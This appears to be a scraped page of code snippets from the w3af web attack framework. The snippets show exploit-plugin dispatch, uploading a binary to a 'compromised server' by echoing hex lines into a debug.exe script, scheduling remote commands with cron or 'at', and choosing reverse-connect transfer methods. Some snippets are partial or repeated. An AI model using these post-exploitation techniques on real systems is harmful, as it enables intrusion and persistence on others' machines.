示例#1
    def _exploit( self , pluginName, params, showList=True):
        '''
        Exploits a vuln. using a single plugin.
        '''
        
        # Did the user indicated what vulnerability to exploit ?
        if len( params ) == 1:
            try:
                vulnToExploit = params[0]
                if vulnToExploit != '*':
                    vulnToExploit = int(params[0])
            except:
                raise w3afException( 'You specified an invalid vulnerability id.' )
        else:
            vulnToExploit = None
        
        if pluginName not in self._configs:
            raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' )
        else:
            self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' )

            try:
                response = plugin.canExploit( vulnToExploit )
            except w3afException, e:
                raise e
            else:
示例#2
    def _configExploit( self, params ):
        '''
        Look up the configuration entry registered for an attack plugin.

        @param params: The command parameters; exactly one item, the plugin name, is expected.
        @return: The value stored in self._configs under that plugin name.
        @raise w3afException: When no name is given, when extra parameters are given,
                              or when the name is not a key of self._configs.
        '''
        paramCount = len( params )
        if paramCount == 0:
            raise w3afException( 'Plugin name was expected.')
        if paramCount > 1:
            extraParams = params[1:]
            raise w3afException( 'Unexpected parameters: ' + ','.join(extraParams) )

        pluginName = params[0]
        # Only names already present in the configuration table are accepted.
        if pluginName in self._configs:
            return self._configs[pluginName]

        raise w3afException( "Unknown plugin " + pluginName)
示例#3
 def transfer( self, strObject, destination ):
     '''
     This method is used to transfer the strObject from w3af to the compromised server.

     The content is written on the remote host as a debug.exe script, one echo
     command per chunk of self._step characters, and the script is then fed to
     debug.exe to produce the binary file. Seen from the remote host this is a
     series of "echo ... >>" appends to a single file, followed by "debug <"
     and "move".

     @param strObject: The content to transfer; each character is sent as a two digit hex value.
     @param destination: Passed to self._getFilename() and self._getExtension() to build the remote file name.
     @raise w3afException: When canTransfer() returns False, or when the output of the
                           remote debug command contains 'file creation error'.
     '''
     om.out.debug('Starting upload.')
     
     # The remote script name; every command below is built by concatenating it unquoted.
     # NOTE(review): presumably _getFilename() returns a name without spaces or shell
     # metacharacters - verify, because such characters would change the remote command.
     self._filename = self._getFilename( destination )
     
     # Check if echo exists and works as expected
     # NOTE(review): the attribute name "_exec_methodutedCanTransfer" looks like the result of a
     # search-and-replace on another name - confirm that this attribute is actually set somewhere.
     if not self._exec_methodutedCanTransfer:
         if not self.canTransfer():
             raise w3afException('Failed to transfer file to the compromised server, echoWin.canTransfer returned False.')
             
     # if exists, delete _filename (the output stored in res is not inspected)
     res = self._exec_method('del ' + self._filename )
     
     # Prepare the scr file: four header lines appended to the script, the third one
     # being the length of strObject in hex without the "0x" prefix.
     # NOTE(review): the length is written as a single value after "r cx"; presumably this
     # bounds the size of the content that can be transferred - confirm.
     self._exec_method( 'echo n ' + self._filename + '._ >> ' + self._filename )
     self._exec_method( 'echo r cx' + ' >> ' + self._filename )
     self._exec_method( 'echo ' + hex(len(strObject))[2:] + ' >> ' + self._filename)
     self._exec_method( 'echo f 0000 ffff 00' + ' >> ' + self._filename )
     
     # http://www.totse.com/en/technology/computer_technology/windowsdebugco172680.html
     # i is the read position inside strObject, j is the address written after "e";
     # j starts at 256 (0x100) and both advance by self._step on every iteration.
     i = 0
     j = 256
     while i < len( strObject ):
         # Prepare the command
         cmd = "echo e " + hex(j)[2:]
         for c in strObject[i:i+self._step]:
             # Each character becomes a zero padded, two digit hex value.
             cmd += ' ' + hex(ord(c))[2:].zfill(2)
         
         cmd += " >> " + self._filename
         i += self._step
         j += self._step
         # Send the command to the remote server
         self._exec_method( cmd )
     
     # "close" the scr file
     self._exec_method( 'echo w >> ' + self._filename )
     self._exec_method( 'echo q >> ' + self._filename )
     
     # Now, I transform the text file into a exe
     # this trick was taken from sqlninja!
     om.out.debug('Transforming the text file into a binary file. Thanks to icesurfer and sqlninja for this technique!')
     res = self._exec_method( 'debug < ' + self._filename )
     # Only this one error string is looked for in the command output.
     if 'file creation error' in res.lower():
         raise w3afException('Error in remote debug.exe command.')
     extension = self._getExtension( destination )
     # NOTE(review): the debug message ends with an empty "()"; it looks like the extension
     # was meant to be included there.
     om.out.debug('Changing the extension of the binary file to match the original one ()')
     # The output of the move command is stored in res but not checked in the visible code.
     res = self._exec_method( 'move ' + self._filename + '._ ' + self._filename + '.' + extension )
示例#4
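 def _createCronLine( self, remoteDate, commandToExec ):
     '''
     Creates a crontab line that executes the command one minute after the "date" parameter.

     remoteDate is output read back from the remote server, so every field is split and
     converted inside the try block: any malformed value is reported as a w3afException
     instead of escaping as a ValueError. The handler catches Exception rather than using
     a bare except, so KeyboardInterrupt and SystemExit are not swallowed.

     @param remoteDate: The output of date +"%d-%m-%H:%M:%S-%u" on the remote server.
     @param commandToExec: The command placed, unchanged, at the end of the crontab line.
     @return: A tuple with the new line to add to the crontab, and the time that it will take to run the command.
     @raise w3afException: When remoteDate does not have the expected format.
     '''
     try:
         # date +"%d-%m-%H:%M:%S-%u"
         dayNumber, month, clock, weekDay = remoteDate.split('-')
         hour, minute, sec = clock.split(':')
         minute = int( minute )
         sec = int( sec )
     except Exception:
         raise w3afException('The date command of the remote server returned an unknown format.')

     if sec > 57:
         # Just to be 100% sure: too close to the next minute, so skip one more.
         delta = 2
         waitTime = 4 + 60
     else:
         delta = 1
         waitTime = 60 - sec

     # NOTE(review): dayNumber, month and weekDay are copied as received; if _fixTime()
     # wraps the hour past midnight the day fields are not advanced here - confirm.
     hour, minute, amPm = self._fixTime( hour, minute + delta )

     fields = [ str( minute ), str( hour ), str( dayNumber ), str( month ), str( weekDay ), commandToExec ]
     resLine = ' '.join( fields )

     return resLine, waitTime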
示例#5
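    def _cmd_fastexploit( self , parameters, showList=True):
        '''
        Performs fast exploiting based on the parameters provided by the user, and
        the previous plugin configuration.

        Identifiers for the new results continue from the number of results already
        stored in self._exploitResults, so every new result gets an id. The previous
        loop indexed the new list starting at that count, which left results without
        an id whenever earlier results existed.

        @param parameters: Command parameters; the first item is the attack plugin name.
        @param showList: When True, self._show() is called after a successful run.
        @raise w3afException: When the plugin returns an empty result.
        '''
        # I need this to have logging!
        self._w3af.plugins.init_plugins()

        if not len( parameters ):
            om.out.console( 'Incorrect call to fastexploit, please see the help:' )
            self._cmd_help( ['fastexploit'] )
            return

        pluginName = parameters[0]
        if pluginName not in self._w3af.plugins.getPluginList('attack'):
            om.out.console( 'Unknown plugin. Use the list command to view available plugins.' )
            return

        self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' )

        # Exceptions raised by the plugin propagate unchanged to the caller.
        exploit_result = plugin.fastExploit()

        # Check for an empty result before it is measured or iterated.
        if not exploit_result:
            raise w3afException( 'Failed to exploit vulnerability.')

        # Assign a unique identifier to each new shell
        firstId = len( self._exploitResults )
        for offset, shell in enumerate( exploit_result ):
            shell.setExploitResultId( firstId + offset )

        self._exploitResults.extend( exploit_result )
        om.out.console( 'Vulnerability successfully exploited. ' , newLine=not showList )
        if showList:
            self._show()
            om.out.console( 'Please use the interact command to interact with the shell objects.' )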
 def getPriority( self ):
     '''
     Report the priority used when mangle plugins are sorted.
     Every mangle plugin is expected to override this method; this version only raises.

     @return: An integer specifying the priority. 100 is run first, 0 last.
     '''
     msg = 'Plugin is not implementing required method getPriority'
     raise w3afException( msg )
 def getDelayedExecutionHandler( self ):
     '''
     Pick the delayed execution handler that matches the result of osDetectionExec().

     @return: An atHandler when the detection result is 'windows', a crontabHandler
              when it is 'linux'; both are built with self._execMethod.
     @raise w3afException: For any other detection result.
     '''
     remoteOs = osDetectionExec( self._execMethod )

     if remoteOs == 'windows':
         return atHandler( self._execMethod )

     if remoteOs == 'linux':
         return crontabHandler( self._execMethod )

     raise w3afException('Failed to create a delayed execution handler.')
 def mangleResponse(self, response ):
     '''
     Mangle a response.

     Every plugin MUST override this method; this version only raises.

     @param response: This is the response to mangle.
     @return: A mangled version of the response.
     '''
     msg = 'Plugin is not implementing required method mangleResponse'
     raise w3afException( msg )
示例#9
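    def _createAtCommand( self, time, command ):
        '''
        Creates an at command based on the time and command parameter. 

        This is the format i'm expecting for the time parameter:
        
        The current time is: 11:24:19.59
        Enter the new time:

        The time string is output read back from the remote server, so all the numeric
        conversions are done inside the try block: a non numeric hour, minute or seconds
        field is reported as a w3afException instead of escaping as a ValueError. The
        handler catches Exception rather than using a bare except, so KeyboardInterrupt
        and SystemExit are not swallowed.

        @param time: The output of the remote time command; only its first line is parsed.
        @param command: The command placed, unchanged, at the end of the "at" command.
        @return: A tuple with the "at" command, and the time that it will take to run the command.
        @raise w3afException: When the time parameter does not have the expected format.
        '''
        try:
            # Drop the text before the first ':' and keep hour, minute and seconds.
            timeFields = time.split('\n')[0].split(':')[1:]
            hour = timeFields[0]
            minute = timeFields[1]
            if '.' in timeFields[2]:
                # windows 2k
                seconds = timeFields[2].split('.')[0]
            else:
                # windows XP: the output format of the time command differs between releases.
                seconds = timeFields[2].split(',')[0]

            # hour is only validated here, it is passed on to _fixTime() as received.
            int( hour )
            minute = int( minute )
            seconds = int( seconds )
        except Exception:
            raise w3afException('The time command of the remote server returned an unknown format.')

        # TODO: this used to be amPm = 'a' for hours up to 12; check if that is
        # really necessary. Both branches currently used the empty string.
        amPm = ''

        if seconds > 57:
            # Just to be 100% sure: too close to the next minute, so skip one more.
            delta = 2
            waitTime = 60 + 5
        else:
            delta = 1
            waitTime = 60 - seconds

        hour, minute, amPm = self._fixTime( hour, minute + delta, amPm )

        res = 'at ' + str(hour) + ':' + str( minute ).zfill(2) + amPm + ' ' + command

        return res, waitTime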
示例#10
    def _exploitAll( self, params ):
        '''
        Run the attack plugins against all the vulnerabilities returned by
        kb.kb.getAllVulns(), trying the plugins in descending getRootProbability() order.

        @param params: Command parameters; either empty or the single word 'stopOnFirst',
                       which stops the run after the first successful exploit.
        @raise w3afException: When unexpected parameters are given.
        '''
        stopOnFirst = len(params) > 0 and params[0] == 'stopOnFirst'
        # One parameter is accepted only when it is the stopOnFirst keyword.
        maxLen = int(stopOnFirst)
        if len(params) > maxLen:
            raise w3afException( 'Unexpected parameters: ' + \
                ','.join(params[maxLen:]))

        vuln_list = kb.kb.getAllVulns()
        if not vuln_list:
            om.out.console('They are no vulnerabilities to exploit.')
            return

        # Now I create the instances...
        instanceList = [ self._w3af.plugins.getPluginInstance( pluginName, 'attack' )
                         for pluginName in self._w3af.plugins.getPluginList( 'attack' ) ]

        # Its time to sort... highest root probability first.
        instanceList.sort( key=lambda inst: inst.getRootProbability(), reverse=True )

        # To have a nicer console ;)
        not_run = []

        # Exploit !
        for ap in instanceList:

            if not ap.canExploit():
                # save to report later
                not_run.append(ap.getName())
                continue

            # can exploit!
            om.out.console( 'Executing '+ ap.getName() +'.attack plugin to all vulnerabilities:' )

            stopNow = False
            for vuln_obj in vuln_list:
                om.out.console( '- Exploiting vulnerability with id:' + str(vuln_obj.getId()) )

                # NOTE(review): _exploit() calls len() on its second argument and reads
                # index 0 of it, so it looks like it expects a parameter list; here the
                # raw getId() value is passed - confirm what getId() returns.
                try:
                    self._exploit( ap.getName() , vuln_obj.getId(), showList=False )
                except w3afException as w:
                    # A failed attempt is reported and the next vulnerability is tried.
                    om.out.console( str(w) )
                else:
                    # We get here when the exploit was successful
                    if stopOnFirst:
                        stopNow = True
                        break

            om.out.console('')
            if stopNow:
                break

        msg = 'The following plugins weren\'t run because they can\'t exploit any of the'
        msg += ' previously discovered vulnerabilities: ' + ', '.join(not_run)
        om.out.console( msg )
        om.out.console('')

        if self._exploitResults:
            self._show()
            om.out.console( 'Please use the "interact" command to use the shell objects.' )
示例#11
                raise w3afException( 'You specified an invalid vulnerability id.' )
        else:
            vulnToExploit = None
        
        if pluginName not in self._configs:
            raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' )
        else:
            self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' )

            try:
                response = plugin.canExploit( vulnToExploit )
            except w3afException, e:
                raise e
            else:
                if not response:
                    raise w3afException( 'No exploitable vulnerabilities found.' )
                else:
                    try:
                        exploit_result = plugin.exploit( vulnToExploit )
                    except w3afMustStopException,  w3mse:
                        raise w3afException( str(w3mse) )
                    except w3afException,  w3:
                        raise w3
                    else:
                        # everything went ok!
                        if not exploit_result:
                            raise w3afException( 'Failed to exploit vulnerability.')
                        else:                            
                            # Assign a unique identifier to this shell
                            for i in range(len(self._exploitResults), len(exploit_result) ):
                                exploit_result[i].setExploitResultId( i )
示例#12
 def getSpeed( self ):
     '''
     Report the speed of this transfer object; subclasses are expected to override
     this method, this version only raises.

     @return: The transfer speed of the transfer object. It should return a number between 100 (fast) and 1 (slow)
     '''
     msg = 'You should implement the getSpeed method when you inherit from echo.'
     raise w3afException( msg )
示例#13
 def transfer( self, strObject, destination ):
     '''
     Transfer strObject from w3af to the compromised server.

     Subclasses are expected to override this method; this version only raises.
     '''
     msg = 'You should implement the transfer method when you inherit from basePayloadTransfer.'
     raise w3afException( msg )
示例#14
 def estimateTransferTime( self, size ):
     '''
     Estimate how long a transfer takes; subclasses are expected to override
     this method, this version only raises.

     @param size: The size of the file to transfer.
     @return: An estimated transfer time for a file with the specified size.
     '''
     msg = 'You should implement the estimateTransferTime method when you inherit from basePayloadTransfer.'
     raise w3afException( msg )
示例#15
 def canTransfer( self ):
     '''
     Test if the transfer method works as expected. Usually the implementation
     should transfer 10 bytes and check if they arrived as expected to the other end.

     Subclasses are expected to override this method; this version only raises.
     '''
     msg = 'You should implement the canTransfer method when you inherit from basePayloadTransfer.'
     raise w3afException( msg )
示例#16
        try:
            if not inboundPort:
                inboundPort = self._es.getInboundPort()
        except w3afException, w3:
            om.out.error( 'The extrusion test failed, no reverse connect transfer methods can be used. Trying inband echo transfer method.' )
            om.out.error( 'Error: ' + str(w3) )
        except Exception, e:
            om.out.error('Unhandled exception: ' + str(e) )
        else:
            to_test.append( reverseFTP( self._exec_method, os, inboundPort ) )
            if os == 'windows':
                to_test.append( clientlessReverseTFTP( self._exec_method, os, inboundPort ) )
            elif os == 'linux':
                to_test.append( clientlessReverseHTTP( self._exec_method, os, inboundPort ) )
            
            # Test the fastest first and return the fastest one...
            def sortFunction( x ,y ):
                return cmp( y.getSpeed() , x.getSpeed() )
            to_test.sort( sortFunction )
            
        for method in to_test:
            
            om.out.debug('Testing if "' + str(method) + '" is able to transfer a file to the compromised host.')
            if method.canTransfer():
                om.out.debug('The "' + str(method) + '" method is able to transfer a file to the compromised host.')
                return method
            else:
                om.out.debug('The "' + str(method) + '" method *FAILED* to transfer a file to the compromised host.')
        
        raise w3afException('Failed to transfer a file to the remote host! All the transfer methods failed.')